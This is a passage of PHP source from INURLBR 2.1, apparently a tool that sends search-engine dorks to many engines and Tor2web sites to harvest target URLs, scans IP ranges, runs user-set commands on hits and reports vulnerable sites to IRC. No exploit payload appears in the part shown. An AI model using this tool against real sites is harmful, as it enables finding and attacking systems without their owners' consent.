  3294.     echo (!is_null($list_proxy_) ? "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ PROXY FILE RANDOM ]:: {$_SESSION["c1"]}[ {$list_proxy_} ]{$_SESSION["c0"]} " : NULL );
  3295.  
  3296. ################################################################################
  3297. # SEARCH ENGINE :::  google
  3298. ################################################################################
  3299.  
  3300.     if (__validateOptions($_SESSION["config"]["motor"], 1) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3301.  
  3302.         $randHost = __dominioGoogleRandom();
  3303.         $_SESSION["config"]["dork_tmp"] = $dork_;
  3304.         $_SESSION["config"]["conf_array_tmp"] = $confArray;
  3305.         __pageEngine($confArray, "GOOGLE - {$randHost}", "https://{$randHost}/search?q=[DORK]&num=1500&btnG=Search&pws=1", $dork_, $postDados, 0, 0, 1);
  3306.     }
  3307.  
  3308.  
  3309. ################################################################################
  3310. # SEARCH ENGINE :::  bing
  3311. ################################################################################
  3312.  
  3313.     if (__validateOptions($_SESSION["config"]["motor"], 2) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3314.  
  3315.         __pageEngine($confArray, "BING", "http://www.bing.com/search?q=[DORK]&&filt=rf&first=[PAG]", $dork_, $postDados, 1, 991, 50);
  3316.     }
  3317.  
  3318. ################################################################################
  3319. # SEARCH ENGINE :::  yahoo
  3320. ################################################################################
  3321.  
  3322.     if (__validateOptions($_SESSION["config"]["motor"], 3) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3323.  
  3324.         __pageEngine($confArray, "YAHOO BR", "http://search.yahoo.com/search?p=[DORK]&ei=UTF-8&b=[PAG]", $dork_, $postDados, 1, 471, 10);
  3325.     }
  3326.  
  3327. ################################################################################
  3328. # SEARCH ENGINE :::  ask
  3329. ################################################################################
  3330.  
  3331.     if (__validateOptions($_SESSION["config"]["motor"], 4) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3332.  
  3333.         __pageEngine($confArray, "ASK", "http://www.ask.com/web?q=[DORK]&page=[PAG]&qid=[RANDOM]", $dork_, $postDados, 0, 16, 1);
  3334.     }
  3335.  
  3336. ################################################################################
  3337. # SEARCH ENGINE :::  hao123
  3338. ################################################################################
  3339.  
  3340.  
  3341.     if (__validateOptions($_SESSION["config"]["motor"], 5) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3342.  
  3343.         __pageEngine($confArray, "HAO123 BR", "http://search.hao123.com.br/s?tn=[RANDOM]&f=0&wd=[DORK]&haobd=[RANDOM]FG=1&ie=utf-8&pn=[PAG]&showTop=0", $dork_, $postDados, 0, 550, 10);
  3344.     }
  3345.  
  3346. ################################################################################
  3347. # SEARCH ENGINE :::  googleapis
  3348. ################################################################################
  3349.  
  3350.     if (__validateOptions($_SESSION["config"]["motor"], 1) || __validateOptions($_SESSION["config"]["motor"], 6) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3351.  
  3352.         __pageEngine($confArray, "GOOGLE API", "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&rsz=8&q=[DORK]&start=[PAG]&userip=[IP]&filter=1&safe=off", $dork_, $postDados, 0, 56, 4);
  3353.     }
  3354.  
  3355. ################################################################################
  3356. # SEARCH ENGINE :::  lycos
  3357. ################################################################################
  3358.  
  3359.     if (__validateOptions($_SESSION["config"]["motor"], 7) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3360.         $_ = __request_info("http://search.lycos.com", $_SESSION["config"]["proxy"], $postDados);
  3361.         $_SESSION["config"]["idPesquisaLycos"] = __getIdSearchLycos($_["corpo"]);
  3362.  
  3363.         __pageEngine($confArray, "LYCOS", "http://search.lycos.com/web?q=[DORK]&keyvol={$_SESSION["config"]["idPesquisaLycos"]}&pn=[PAG]", $dork_, $postDados, 0, 24, 1);
  3364.     }
  3365.  
  3366. ################################################################################
  3367. # SEARCH ENGINE :::  uol.com.br
  3368. ################################################################################
  3369.  
  3370.     if (__validateOptions($_SESSION["config"]["motor"], 8) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3371.  
  3372.         __pageEngine($confArray, "UOL BR", "http://busca.uol.com.br/web/?q=[DORK]&start=[PAG]", $dork_, $postDados, 10, 130, 10);
  3373.     }
  3374.  
  3375. ################################################################################
  3376. # SEARCH ENGINE :::  us.yhs4.search.yahoo
  3377. ################################################################################
  3378.  
  3379.     if (__validateOptions($_SESSION["config"]["motor"], 9) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3380.  
  3381.         __pageEngine($confArray, "YAHOO US", "http://us.yhs4.search.yahoo.com/yhs/search?p=[DORK]&fr=goodsearch-yhsif&b=[PAG]", $dork_, $postDados, 1, 551, 10);
  3382.     }
  3383.  
  3384. ################################################################################
  3385. # SEARCH ENGINE :::  sapo.pt
  3386. ################################################################################
  3387.  
  3388.     if (__validateOptions($_SESSION["config"]["motor"], 10) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3389.  
  3390.         __pageEngine($confArray, "SAPO", "http://pesquisa.sapo.pt/?adultfilter=strict&barra=resumo&cluster=0&format=html&limit=10&location=pt&page=[PAG]&q=[DORK]&st=web", $dork_, $postDados, 0, 14, 1);
  3391.     }
  3392.  
  3393. ################################################################################
  3394. # SEARCH ENGINE :::  dmoz
  3395. ################################################################################
  3396.  
  3397.     if (__validateOptions($_SESSION["config"]["motor"], 11) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3398.  
  3399.         __pageEngine($confArray, "DMOZ", "http://www.dmoz.org/search/search?q=[DORK]&start=[PAG]&type=next&all=yes&cat=", $dork_, $postDados, 0, 800, 20);
  3400.     }
  3401.  
  3402. ################################################################################
  3403. # SEARCH ENGINE :::  gigablast
  3404. ################################################################################
  3405.  
  3406.     if (__validateOptions($_SESSION["config"]["motor"], 12) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3407.  
  3408.         __pageEngine($confArray, "GIGABLAST", "http://www.gigablast.com/search?k3h=223119&s=22&rat=0&sc=1&ns=100&n=100&sites=&q=[DORK]", $dork_, $postDados, 0, 1, 1);
  3409.     }
  3410.  
  3411. ################################################################################
  3412. # SEARCH ENGINE :::  web.search.naver.com
  3413. ################################################################################
  3414.  
  3415.     if (__validateOptions($_SESSION["config"]["motor"], 13) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3416.  
  3417.         __pageEngine($confArray, "NEVER", "http://web.search.naver.com/search.naver?where=webkr&query=[DORK]&xc=&docid=0&qt=df&lang=all&f=&r=&st=s&fd=2&start=[PAG]", $dork_, $postDados, 1, 500, 10);
  3418.     }
  3419.  
  3420. ################################################################################
  3421. # SEARCH ENGINE :::  br.baidu.com
  3422. ################################################################################
  3423.  
  3424.     if (__validateOptions($_SESSION["config"]["motor"], 14) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3425.  
  3426.         __pageEngine($confArray, "BAIDU BR", "http://www.baidu.com.br/s?usm=1&rn=100&wd=[DORK]&ie=utf-8&pn=[PAG]&showTop=0", $dork_, $postDados, 0, 1500, 100);
  3427.     }
  3428.  
  3429. ################################################################################
  3430. # SEARCH ENGINE :::  www.yandex.ru
  3431. ################################################################################
  3432.  
  3433.     if (__validateOptions($_SESSION["config"]["motor"], 15) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3434.  
  3435.         __pageEngine($confArray, "YANDEX", "http://yandex.ru/yandsearch?text=[DORK]&p=[PAG]&lr=10136", $dork_, $postDados, 0, 30, 1);
  3436.     }
  3437.  
  3438. ################################################################################
  3439. # SEARCH ENGINE :::  www.zoo.com
  3440. ################################################################################
  3441.  
  3442.     if (__validateOptions($_SESSION["config"]["motor"], 16) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3443.  
  3444.         __pageEngine($confArray, "ZOO", "http://www.zoo.com/Zoo-Site/search/web?qsi=[PAG2]&q=[DORK]&p=[PAG]&fcoid=4&fpid=2", $dork_, $postDados, 1, 211, 20, 10);
  3445.     }
  3446.  
  3447. ################################################################################
  3448. # SEARCH ENGINE :::  www.hotbot.com
  3449. ################################################################################
  3450.  
  3451.     if (__validateOptions($_SESSION["config"]["motor"], 17) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3452.         $_ = __request_info("http://www.hotbot.com/", $_SESSION["config"]["proxy"], $postDados);
  3453.         $_SESSION["config"]["idPesquisaLycos"] = __getIdSearchLycos($_["corpo"]);
  3454.         __pageEngine($confArray, "HOTBOT", "http://www.hotbot.com/search/web?pn=[PAG]web?q=[DORK]&keyvol={$_SESSION["config"]["idPesquisaLycos"]}", $dork_, $postDados, 0, 24, 1);
  3455.     }
  3456.  
  3457. ################################################################################
  3458. # SEARCH ENGINE :::  www.zhongsou.com
  3459. ################################################################################
  3460.  
  3461.     if (__validateOptions($_SESSION["config"]["motor"], 18) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3462.  
  3463.         __pageEngine($confArray, "ZHONGSOU", "http://www.zhongsou.com/third?w=[DORK]&b=[PAG]", $dork_, $postDados, 1, 50, 1);
  3464.     }
  3465.  
  3466. ################################################################################
  3467. # SEARCH ENGINE :::  hksearch.timway.com
  3468. ################################################################################
  3469.    if (__validateOptions($_SESSION["config"]["motor"], 19) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3470.  
  3471.         __pageEngine($confArray, "HKSEARCH", "http://hksearch.timway.com/search.php?query=[DORK]&region=zh-hant-hk&p=[PAG]", $dork_, $postDados, 1, 12, 1);
  3472.     }
  3473.  
  3474. ################################################################################
  3475. # SEARCH ENGINE :::  find.ezilon.com / USA
  3476. ################################################################################
  3477.  
  3478.     if (__validateOptions($_SESSION["config"]["motor"], 20) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3479.  
  3480.         __pageEngine($confArray, "EZILION USA", "http://find.ezilon.com/search.php?q=[DORK]&start=[PAG]&t=&v=usa&f=", $dork_, $postDados, 0, 215, 15);
  3481.     }
  3482.  
  3483. ################################################################################
  3484. # SEARCH ENGINE :::  find.ezilon.com / ASIA
  3485. ################################################################################
  3486.  
  3487.     if (__validateOptions($_SESSION["config"]["motor"], 20) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3488.  
  3489.         __pageEngine($confArray, "EZILION ASIA", "http://find.ezilon.com/search.php?q=[DORK]&start=[PAG]&t=&v=asia&f=", $dork_, $postDados, 0, 215, 15);
  3490.     }
  3491.  
  3492. ################################################################################
  3493. # SEARCH ENGINE :::  find.ezilon.com / EUROPA
  3494. ################################################################################
  3495.  
  3496.     if (__validateOptions($_SESSION["config"]["motor"], 20) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3497.  
  3498.         __pageEngine($confArray, "EZILION EUROPA", "http://find.ezilon.com/search.php?q=[DORK]&start=[PAG]&t=&v=eu&f=", $dork_, $postDados, 0, 215, 15);
  3499.     }
  3500.  
  3501. ################################################################################
  3502. # SEARCH ENGINE :::  find.ezilon.com / INDIA
  3503. ################################################################################
  3504.    if (__validateOptions($_SESSION["config"]["motor"], 20) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3505.  
  3506.         __pageEngine($confArray, "EZILION INDIA", "http://find.ezilon.com/search.php?q=[DORK]&start=[PAG]&t=&v=in&f=", $dork_, $postDados, 0, 215, 15);
  3507.     }
  3508.  
  3509. ################################################################################
  3510. # SEARCH ENGINE :::  www.sogou.com
  3511. ################################################################################
  3512.  
  3513.     if (__validateOptions($_SESSION["config"]["motor"], 21) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3514.  
  3515.         __pageEngine($confArray, "SOGOU", "http://www.sogou.com/web?query=[DORK]&page=[pag]&ie=utf8", $dork_, $postDados, 1, 20, 1);
  3516.     }
  3517.  
  3518. ################################################################################
  3519. # SEARCH ENGINE :::  api.duckduckgo.com
  3520. ################################################################################
  3521.  
  3522.     if (__validateOptions($_SESSION["config"]["motor"], 22) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3523.  
  3524.         $postDados = TRUE;
  3525.         __pageEngine($confArray, "DUCK DUCK GO", "https://api.duckduckgo.com/html/?q=[DORK]&kl=en-us&p=-1&s=[PAG]&dc=[PAG3]&o=json&api=d.js", $dork_, $postDados, 0, 800, 50, 0, 37);
  3526.     }
  3527.  
  3528. ################################################################################
  3529. # SEARCH ENGINE :::  boorow
  3530. ################################################################################
  3531.  
  3532.     if (__validateOptions($_SESSION["config"]["motor"], 23) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3533.  
  3534.         $postDados = TRUE;
  3535.         __pageEngine($confArray, "BOOROW", "http://boorow.com/Pages/site_br_aspx?query=[DORK]", $dork_, $postDados, 0, 0, 1);
  3536.     }
  3537.  
  3538. ################################################################################
  3539. # SEARCH ENGINE ::: Google Generic RANDOM
  3540. ################################################################################
  3541.  
  3542.     if (__validateOptions($_SESSION["config"]["motor"], 24) || __validateOptions($_SESSION["config"]["motor"], 1) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3543.  
  3544.         $randHost = __dominioGoogleRandom();
  3545.         $randGeneric = __googleGenericRandom();
  3546.         __pageEngine($confArray, "GOOGLE_GENERIC_RANDOM - {$randHost} ID: {$randGeneric}", "http://{$randHost}/cse?cx={$randGeneric}&q=[DORK]&num=500&hl=en&as_qdr=all&start=[PAG]&sa=N", $dork_, $postDados, 0, 5, 1);
  3547.     }
  3548.  
  3549.  
  3550. #===============================================================================
  3551. #===============================================================================
  3552. #===============================================================================
  3553. #======================[ MOTORES DE BUSCA ESPECIAIS  ]==========================
  3554. #===============================================================================
  3555. #===============================================================================
  3556. #===============================================================================
  3557. #===============================================================================
  3558. # SEARCH ENGINE :::  ndj6p3asftxboa7j.tor2web.org / Tor find ===================
  3559. #===============================================================================
  3560.  
  3561.     if (__validateOptions($_SESSION["config"]["motor"], "e1")) {
  3562.  
  3563.         __pageEngine("TOR FIND", "https://ndj6p3asftxboa7j.tor2web.org/search.php?search_query=[DORK]&page_num=[PAG]&domainchoice=onion", $dork_, $postDados, 1, 5, 1);
  3564.     }
  3565.  
  3566. #===============================================================================
  3567. # SEARCH ENGINE :::  elephantjmjqepsw.tor2web.org ==============================
  3568. #===============================================================================
  3569.  
  3570.     if (__validateOptions($_SESSION["config"]["motor"], "e2")) {
  3571.  
  3572.         __pageEngine("ELEPHANT", "https://elephantjmjqepsw.tor2web.orgsearch?q=[DORK]&page=[PAG]", $dork_, $postDados, 0, 29, 1);
  3573.     }
  3574.  
  3575. #===============================================================================
  3576. # SEARCH ENGINE :::  kbhpodhnfxl3clb4.tor2web.org ==============================
  3577. #===============================================================================
  3578.  
  3579.     if (__validateOptions($_SESSION["config"]["motor"], "e3")) {
  3580.  
  3581.         __pageEngine("TORSEARCH", "https://kbhpodhnfxl3clb4.tor2web.org/en/search?j=f&page=[PAG]&q=[DORK]&utf8=%E2%9C%93", $dork_, $postDados, 0, 10, 1);
  3582.     }
  3583.  
  3584. #===============================================================================
  3585. # SEARCH ENGINE :::  search.wikileaks.org ======================================
  3586. #===============================================================================
  3587.  
  3588.     if (__validateOptions($_SESSION["config"]["motor"], "e4")) {
  3589.  
  3590.         __pageEngine("WIKILEAKS", "https://search.wikileaks.org/?page=[PAG]&q=[DORK]&sort=0#results", $dork_, $postDados, 1, 60, 1);
  3591.     }
  3592.  
  3593. #===============================================================================
  3594. # SEARCH ENGINE ::: oth.net ====================================================
  3595. #===============================================================================
  3596.  
  3597.     if (__validateOptions($_SESSION["config"]["motor"], "e5")) {
  3598.  
  3599.         __pageEngine("OTN", "http://oth.net/s/s?q=[DORK]&cl=1&skip=[PAG]", $dork_, $postDados, 1, 211, 20);
  3600.     }
  3601.  
  3602. #===============================================================================
  3603. # SEARCH ENGINE ::: exploits.shodan.io =========================================
  3604. #===============================================================================
  3605.  
  3606.     if (__validateOptions($_SESSION["config"]["motor"], "e6")) {
  3607.  
  3608.         __pageEngine("EXPLOITS SHODAN", "https://exploits.shodan.io/?q=[DORK]&p=[PAG]", $dork_, $postDados, 1, 25, 1);
  3609.     }
  3610.  
  3611.     __plus();
  3612. }
  3613.  
  3614. ################################################################################
  3615. #INITIAL INFORMATION############################################################
  3616. ################################################################################
  3617.  
  3618. function __startingBanner() {
  3619.  
  3620.     echo "\n{$_SESSION["c1"]}[ ! ] Starting SCANNER INURLBR 2.1 at [" . date("d-m-Y H:i:s") . "]{$_SESSION["c9"]}
  3621. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  3622. It is the end user's responsibility to obey all applicable local, state and federal laws.
  3623. Developers assume no liability and are not responsible for any misuse or damage caused by this program{$_SESSION["c0"]}\n";
  3624.  
  3625.     $file = not_isnull_empty($_SESSION['config']['arquivo_output']) ? $_SESSION['config']['arquivo_output'] : NULL;
  3626.     $file_all = not_isnull_empty($_SESSION['config']['arquivo_output_all']) ? $_SESSION['config']['arquivo_output_all'] : NULL;
  3627.     $command = not_isnull_empty($_SESSION['config']['command-vul']) ? $_SESSION['config']['command-vul'] : $_SESSION['config']['command-all'];
  3628.     $subcommand = not_isnull_empty($_SESSION['config']['sub-cmd-vul']) ? $_SESSION['config']['sub-cmd-vul'] : $_SESSION['config']['sub-cmd-all'];
  3629.  
  3630.     echo (not_isnull_empty($_SESSION['config']['ifemail']) ?
  3631.             "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ FILTER EMAIL ]::{$_SESSION["c1"]}[ {$_SESSION['config']['ifemail']} ]{$_SESSION["c0"]}" : NULL);
  3632.  
  3633.     echo (is_array($_SESSION['config']['dork-file']) ?
  3634.             "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ DORK FILE ]::{$_SESSION["c1"]}[ {$_SESSION['config']['dork-file']} ]{$_SESSION["c0"]}" : NULL);
  3635.  
  3636.     echo (not_isnull_empty($_SESSION['config']['dork-rand']) ?
  3637.             "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ DORKS GENERATED ]::{$_SESSION["c1"]}[ {$_SESSION['config']['dork-rand']} ]{$_SESSION["c0"]}" : NULL);
  3638.  
  3639.     echo (is_array($_SESSION['config']['irc']['conf']) ?
  3640.             "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ SEND VULN IRC ]::{$_SESSION["c1"]}[ server: {$_SESSION['config']['irc']['conf'][0]} / channel: {$_SESSION['config']['irc']['conf'][1]} ]{$_SESSION["c0"]}" : NULL);
  3641.  
  3642.     echo (not_isnull_empty($_SESSION['config']['ifurl']) ?
  3643.             "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ FILTER URL ]::{$_SESSION["c1"]}[ {$_SESSION['config']['ifurl']} ]{$_SESSION["c0"]}" : NULL);
  3644.  
  3645.     echo (not_isnull_empty($file) ?
  3646.             "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ OUTPUT FILE ]::{$_SESSION["c1"]} [ " . getcwd() . "/{$_SESSION['config']['out_put_paste']}{$file}  ]{$_SESSION["c0"]}" : NULL);
  3647.  
  3648.     echo (not_isnull_empty($file_all) ?
  3649.             "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ OUTPUT FILE ALL ]::{$_SESSION["c1"]}[ " . getcwd() . "/{$_SESSION['config']['out_put_paste']}{$file_all}  ]{$_SESSION["c0"]}" : NULL);
  3650.  
  3651.     echo (not_isnull_empty($command) ?
  3652.             "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ DEFINED EXTERNAL COMMAND ]::{$_SESSION["c1"]} [ $command ]{$_SESSION["c0"]}" : NULL);
  3653.  
  3654.     echo (not_isnull_empty($subcommand) ?
  3655.             "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ DEFINED EXTERNAL SUB_COMMAND ]::{$_SESSION["c1"]} [ $subcommand ]{$_SESSION["c0"]}" : NULL);
  3656.  
  3657.     echo (not_isnull_empty($_SESSION['config']['proxy-file']) ?
  3658.             "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ FILE SOURCE LIST OF PROXY ]::{$_SESSION["c1"]} [ {$_SESSION['config']['proxy-file']} ]{$_SESSION["c0"]}" : NULL);
  3659. }
  3660.  
  3661. ################################################################################
  3662. #RUN WITH SEARCH ENGINES########################################################
  3663. ################################################################################
  3664. # (PHP 4 >= 4.0.1, PHP 5) create_function — Create an anonymous (lambda-style)
  3665. # function http://php.net/manual/en/function.create-function.php
  3666.  
  3667. function __main($dork, $motor, $cod) {
  3668.  
  3669.     $dork_[0] = (strstr($dork, '[DORK]') ? explode('[DORK]', $dork) : array($dork));
  3670.     $dork_[1] = (not_isnull_empty($_SESSION['config']['dork-file']) ? __openFile($_SESSION['config']['dork-file'], 1) : $dork_[0]);
  3671.     $dork_[2] = (not_isnull_empty($_SESSION['config']['dork-rand']) ? __randomDork($_SESSION['config']['dork-rand']) : array());
  3672.     $dork_[3] = array_filter(array_unique(array_merge($dork_[0], $dork_[1], $dork_[2])));
  3673.  
  3674.     $file_proxy = (not_isnull_empty($_SESSION['config']['proxy-file']) ? __openFile($_SESSION['config']['proxy-file'], 1) : NULL);
  3675.     $list_proxy = (is_array($file_proxy) ? ($file_proxy) : NULL);
  3676.  
  3677.     print __bannerLogo();
  3678.  
  3679.     __startingBanner();
  3680.  
  3681.     for ($i = 0; $i <= count($dork_[3]); $i++) {
  3682.  
  3683.         if (!empty($dork_[3][$i])) {
  3684.  
  3685.             echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ DORK ]::{$_SESSION["c1"]}[ {$dork_[3][$i]} ]\n";
  3686.  
  3687.             //$objNewSearch = create_function('$dork_, $motor, $list_proxy', $cod);
  3688.             //$objNewSearch(urlencode($dork_[3][$i]), $motor, $list_proxy);
  3689.        
  3690.             __engines(urlencode($dork_[3][$i]), $list_proxy) . __plus();
  3691.  
  3692.             ($_SESSION["config"]["pr"]) ? __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus() : NULL;
  3693.             ($_SESSION["config"]["pr"]) ? $_SESSION["config"]["totas_urls"] = NULL : NULL;
  3694.  
  3695.             echo "\n";
  3696.         }
  3697.     }
  3698.  
  3699.     (!$_SESSION["config"]["pr"]) ? __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus() : NULL;
  3700.  
  3701.     __exitProcess();
  3702. }
  3703.  
  3704. ################################################################################
  3705. #RUN VALIDATION / PROCESSES SCAN RANG IP########################################
  3706. ################################################################################
  3707.  
  3708. if (not_isnull_empty($_SESSION['config']['range']) || not_isnull_empty($_SESSION['config']['range-rand'])) {
  3709.  
  3710.     print __bannerLogo();
  3711.     __startingBanner();
  3712.     not_isnull_empty($_SESSION['config']['range']) ? __process(__generatorRangeIP($_SESSION['config']['range'])) : NULL;
  3713.     not_isnull_empty($_SESSION['config']['range-rand']) ? __process(__generatorIPRandom(array(1 => $_SESSION['config']['range-rand']))) : NULL;
  3714.     __exitProcess();
  3715. }
  3716.  
  3717.  
  3718. ################################################################################
  3719. #RUN VALIDATION / PROCESSES WITH FILE###########################################
  3720. ################################################################################
  3721.  
  3722. if (not_isnull_empty($_SESSION['config']['abrir-arquivo'])) {
  3723.  
  3724.     print __bannerLogo();
  3725.     __startingBanner();
  3726.     __openFile($_SESSION['config']['abrir-arquivo']);
  3727.     __plus();
  3728.     __exitProcess();
  3729. }
  3730.  
  3731. ################################################################################
  3732. #RUN WITH SEARCH ENGINES########################################################
  3733. ################################################################################
  3734.  
  3735. __main($_SESSION['config']['dork'], $_SESSION['config']['motor'], $_SESSION['config']['cod']);
  3736.  
  3737. function __extra() {
  3738.  
  3739.     $banners = array(
  3740.         "{$_SESSION["c1"]}
  3741. _ _  _ _  _ ____ _    ___  ____
  3742. | |\ | |  | |__/ |    |__] |__/
  3743. | | \| |__| |  \ |___ |__] |  \
  3744. ", "{$_SESSION["c1"]}
  3745. (        )         (    (          (    
  3746. )\ )  ( /(         )\ ) )\ )   (   )\ )  
  3747. (()/(  )\())    (  (()/((()/( ( )\ (()/(  
  3748. /(_))((_)\     )\  /(_))/(_)))((_) /(_))
  3749. (_))   _((_) _ ((_)(_)) (_)) ((_)_ (_))  
  3750. |_ _| | \| || | | || _ \| |   | _ )| _ \  
  3751. | |  | .` || |_| ||   /| |__ | _ \|   /  
  3752. |___| |_|\_| \___/ |_|_\|____||___/|_|_\
  3753. ", "{$_SESSION["c1"]}
  3754. .-..-. .-..-. .-..----. .-.   .----. .----.
  3755. | ||  `| || { } || {}  }| |   | {}  }| {}  }
  3756. | || |\  || {_} || .-. \| `--.| {}  }| .-. \
  3757. `-'`-' `-'`-----'`-' `-'`----'`----' `-' `-'
  3758.     ", "{$_SESSION["c1"]}
  3759. ___ _   _ _   _ ____  _     ____  ____  
  3760. |_ _| \ | | | | |  _ \| |   | __ )|  _ \
  3761. | ||  \| | | | | |_) | |   |  _ \| |_) |
  3762. | || |\  | |_| |  _ <| |___| |_) |  _ <
  3763. |___|_| \_|\___/|_| \_\_____|____/|_| \_\
  3764. ", "{$_SESSION["c1"]}
  3765.                                     /~\
  3766.                                    |oo )      /INURLBR
  3767.                                    _\=/_
  3768.                    ___        #   /  _  \   #
  3769.                   /() \        \\//|/.\|\\//
  3770.                 _|_____|_       \/  \_/  \/
  3771.                | | === | |         |\ /|
  3772.                |_|  O  |_|         \_ _/
  3773.                 ||  O  ||          | | |
  3774.                 ||__*__||          | | |
  3775.                |~ \___/ ~|         []|[]
  3776.                /=\ /=\ /=\         | | |
  3777. ________________[_]_[_]_[_]________/_]_[_\_________________________
  3778. ", "{$_SESSION["c1"]}
  3779. ______   __  __  __  __  ____    __       ____     ____      
  3780. /\__  _\ /\ \/\ \/\ \/\ \/\  _`\ /\ \     /\  _`\  /\  _`\    
  3781. \/_/\ \/ \ \ `\\ \ \ \ \ \ \ \L\ \ \ \    \ \ \L\ \\ \ \L\ \  
  3782.   \ \ \  \ \ , ` \ \ \ \ \ \ ,  /\ \ \  __\ \  _ <'\ \ ,  /  
  3783.    \_\ \__\ \ \`\ \ \ \_\ \ \ \\ \\ \ \L\ \\ \ \L\ \\ \ \\ \  
  3784.    /\_____\\ \_\ \_\ \_____\ \_\ \_\ \____/ \ \____/ \ \_\ \_\
  3785.    \/_____/ \/_/\/_/\/_____/\/_/\/ /\/___/   \/___/   \/_/\/ /
  3786. ", "{$_SESSION["c1"]}
  3787. _____ ______  _     _ ______  _       ______ ______  
  3788. (_____)  ___ \| |   | (_____ \| |     (____  (_____ \
  3789.   _  | |   | | |   | |_____) ) |      ____)  )____) )
  3790.  | | | |   | | |   | (_____ (| |     |  __  (_____ (
  3791. _| |_| |   | | |___| |     | | |_____| |__)  )    | |
  3792. (_____)_|   |_|\______|     |_|_______)______/     |_|
  3793. ", "{$_SESSION["c1"]}
  3794.                           ______                                  
  3795.                        .-.      .-.                              
  3796.                       /            \                              
  3797.                      |  [ INURLBR ] |                            
  3798.                      |,  .-.  .-.  ,|                            
  3799.                      | )(|_/  \|_)( |                            
  3800.                      |/     /\     \|                            
  3801.              _       (_     ^^     _)                            
  3802.      _\ ____) \_______\__|IIIIII|__/_______________________________    
  3803.     (_)[___]{}<________|-\IIIIII/-|__INURL__INURL__INURL___________\    
  3804.       /     )_/        \          /                              
  3805.                         \ ______ /
  3806. ", "{$_SESSION["c1"]}
  3807.    
  3808. 88 88b 88 88   88 88**Yb 88     88**Yb 88**Yb
  3809. 88 88Yb88 88   88 88__dP 88     88__dP 88__dP
  3810. 88 88 Y88 Y8   8P 88*Yb  88  .o 88**Yb 88*Yb
  3811. 88 88  Y8 `YbodP' 88  Yb 88ood8 88oodP 88  Yb
  3812. ", "{$_SESSION["c1"]}
  3813.    
  3814.       #                                                
  3815.       ##                        ###                    
  3816.   ### ###  ##  ###  ##  ####### ###     ####### #######
  3817.   ### #### ##  ###  ##       ## ###          ##      ##
  3818.   ### #######  ###  ##  ######  ###     ######  ######
  3819.   ### ### ###  ###  ##  ##  ##  ###     ###  ## ##  ##
  3820.   ### ###  ##   #####   ##   ## ####### ######  ##   ##
  3821.             #    
  3822. ", "{$_SESSION["c1"]}
  3823.    
  3824. __    __   __    __   _______  __      __    __   __    __   _______  __  
  3825. |  |  |  | |  |  |  | |   ____||  |    |  |  |  | |  |  |  | |   ____||  |
  3826. |  |__|  | |  |  |  | |  |__   |  |    |  |__|  | |  |  |  | |  |__   |  |
  3827. |   __   | |  |  |  | |   __|  |  |    |   __   | |  |  |  | |   __|  |  |
  3828. |  |  |  | |  `--'  | |  |____ |__|    |  |  |  | |  `--'  | |  |____ |__|
  3829. |__|  |__|  \______/  |_______|(__)    |__|  |__|  \______/  |_______|(__)                                                                          
  3830. ", "{$_SESSION["c1"]}
  3831. _            _          
  3832. | |__  _ __  | |__  _ __
  3833. | '_ \| '__| | '_ \| '__|
  3834. | |_) | |    | |_) | |  
  3835. |_.__/|_|    |_.__/|_|
  3836. ", "{$_SESSION["c1"]}
  3837.     ___      .__   __. .___________. __   _______    ___      
  3838.    /   \     |  \ |  | |           ||  | |   ____|  /   \    
  3839.   /  ^  \    |   \|  | `---|  |----`|  | |  |__    /  ^  \    
  3840.  /  /_\  \   |  . `  |     |  |     |  | |   __|  /  /_\  \  
  3841. /  _____  \  |  |\   |     |  |     |  | |  |    /  _____  \  
  3842. /__/     \__\ |__| \__|     |__|     |__| |__|   /__/     \__\                                                              
  3843. ", "{$_SESSION["c1"]}
  3844. _____       _                       _          
  3845. /  ___|     | |                     (_)          
  3846. \ `--. _   _| |____   _____ _ __ ___ ___   _____
  3847. `--. \ | | | '_ \ \ / / _ \ '__/ __| \ \ / / _ \
  3848. /\__/ / |_| | |_) \ V /  __/ |  \__ \ |\ V /  __/
  3849. \____/ \__,_|_.__/ \_/ \___|_|  |___/_| \_/ \___|
  3850.  
